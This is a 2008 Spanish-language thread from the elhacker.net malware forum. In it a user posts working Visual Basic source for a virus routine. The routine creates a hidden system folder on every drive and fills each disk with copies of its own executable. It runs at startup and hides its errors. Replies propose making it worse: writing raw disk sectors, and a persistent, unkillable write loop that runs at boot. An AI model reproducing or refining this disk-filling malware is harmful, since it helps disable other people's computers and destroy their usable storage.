elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Ingresar Registrarse
07 Octubre 2008, 23:47  

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Man-In-the-Middle, Hendrix)
| | |-+  Posible función de un virus (Llenar discos)
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Posible función de un virus (Llenar discos)  (Leído 393 veces)
Xerok1!

Desconectado Desconectado

Ver Perfil
Posible función de un virus (Llenar discos)
« en: 17 Junio 2008, 16:19 »

Bueno he estado haciendo unas prácticas y eso e hice una pequeña función(muy simple) típica de un virus que llena el espacio del disco,solo me sirvio para analizar un poco, y bueno ya que se ha cambiado el aire a este foro, pues la publico  ;)..

Para hacer la función se que se podría hacer de mil formas,pero intente atender a la velocidad,rendimiento,tamaño de la aplicacion etc etc..

Bueno aquí va, Utilice un control Drive para evitarme tener que listar los discos por apis :rolleyes:.., Y si veis algun fallo o alguna mejora postearlo haber si lo solucionamos..

Código
Private Declare Function GetDiskFreeSpaceEx Lib "kernel32" Alias "GetDiskFreeSpaceExA" (ByVal lpRootPathName As String, lpFreeBytesAvailableToCaller As Currency, lpTotalNumberOfBytes As Currency, lpTotalNumberOfFreeBytes As Currency) As Long

Private Sub AllDrives(NoLlenar As String)
 On Error Resume Next
  Dim i As Integer
   For i = Drive1.ListIndex To Drive1.ListCount - 1
    rootpathname = Left(Drive1.List(i), 2) + "\"
     Dim r As Long, BytesFreeToCalller As Currency, TotalBytes As Currency
      Dim TotalFreeBytes As Currency, TotalBytesUsed As Currency
       Call GetDiskFreeSpaceEx(rootpathname, BytesFreeToCalller, TotalBytes, TotalFreeBytes)

If Not rootpathname = NoLlenar Then
Dim total As String
 total = Replace(Format$(BytesFreeToCalller * 10000, "###,###,###,##0"), ".", "")
  MkDir rootpathname + "sys"
   SetAttr rootpathname + "sys", vbHidden + vbSystem

Dim im As String
    Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
     im = Input(LOF(1), 1)
      Close #1
       Dim create As String
        create = im + im + im + im + im + im + im + im + im + im + im + im + im + im + im + im 'tamaño de cada copia,ajustar al rendimiento del pc
         Open rootpathname + "sys\sysconf.sys" For Binary As #1
          Put #1, , create
           Close #1

Do While total >= FileLen(rootpathname + "sys\sysconf.sys") 'utilizo este archivo como referencia al tamaño para calcular si el tamaño que queda es menor o mayor que el del archivo
    Dim num As String
     num = (987 * Rnd) / (Rnd + 1)
      num = Int(num)
       FileCopy rootpathname + "sys\sysconf.sys", rootpathname + "sys\" + Replace(Date, "/", "") + Replace(Time, ":", "") + num + Replace(total, ".", "") + ".sys" 'Esto por que en ocasiones los archivos se repetian ;)
         total = total - FileLen(rootpathname + "sys\sysconf.sys")

Loop
Else
 End If
  Next i
   Unload Me
End Sub

Private Sub Form_Load()
On Error Resume Next
AllDrives "" 'si lo dejas vacio llena todos los discos, y si colocas "c:\" se salta este disco
End Sub

Bueno, sencillita ;D No sé si funcionará correctamente en los demas pc..

Un saludo :)

[Firma]Esperando haber si acaba el concurso de firmas y la pongo[/Firma]
Hendrix
Moderador
Conectado Conectado

The Lord of his Middle Earth

Ver Perfil WWW
Re: Posible función de un virus (Llenar discos)
« Respuesta #1 en: 17 Junio 2008, 18:52 »

Bueno, siempre podrías mejorarlo escribiendo directamente en los sectores del DD, ya que si tiene un sistema de archivos que no sea NTFS ni lo va a leer ni lo va a llenar, asi que mejor listar y llenar los discos de otra manera.

Un Saludo

Muchas veces las cosas no se le dan al que las merece más, sino al que sabe pedirlas con insistencia. - Arthur Schopenhauer

seba123neo

Ver Perfil WWW
« Respuesta #2 en: 17 Junio 2008, 19:21 »

mira yo siempre me acuerdo de una que hacia hago una de 4 o 5 lineas de codigo que lo unico que hace es escribir en un archivo de texto en un blucle infinito y se te traba toda la pc ,al 100 % en uso,el tipo que ejecuta ni sabe donde esta el archivo,podes hacer que no pueda matar el proceso,y que empieze cada vez que arranque windows y otra vez empieze a escribir en el disco y no le deja hacer nada hasta que se le llena todo el disco...despues capaz que lo saca,pero que le va a pegar un buen susto durante un tiempo eso es verdad...hasta en pascal lo habia hecho me acuerdo y funciona bien.

Todos somos ignorantes;lo que pasa es que no todos ignoramos las mismas cosas - Albert Einstein
Xerok1!

Ver Perfil
« Respuesta #3 en: 17 Junio 2008, 21:02 »

Gracias por las respuestas :)

Pues tengo una dudilla,
Bueno, siempre podrías mejorarlo escribiendo directamente en los sectores del DD, ya que si tiene un sistema de archivos que no sea NTFS ni lo va a leer ni lo va a llenar, asi que mejor listar y llenar los discos de otra manera.

Un Saludo

A que te refieres con eso, como podría escribir en los sectores del DD?

Un saludo! ;)

Hendrix
Moderador
Conectado Conectado

The Lord of his Middle Earth

Ver Perfil WWW
« Respuesta #4 en: 17 Junio 2008, 21:24 »

En el google hay textos sobre como escribir en los sectores del disco.

http://www.codeguru.com/cpp/w-p/system/misc/article.php/c5765/

Si no encuentras textos especificas, pusca textos mas generales (sobre como hacerlo en C/C++ o ASM, por ejemplo) para entender la parte teorica y luego lo pasas a la práctica en VB.

Un Saludo  :)

Muchas veces las cosas no se le dan al que las merece más, sino al que sabe pedirlas con insistencia. - Arthur Schopenhauer

Xerok1!

Ver Perfil
« Respuesta #5 en: 17 Junio 2008, 21:35 »

Ok perfecto,voy a intentarlo en Asm que estoy aprendiendo y depsues si me funciona lo traduzco..

Un saludo y gracias ;)

Páginas: [1] Ir Arriba Imprimir 
Ir a:  

Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.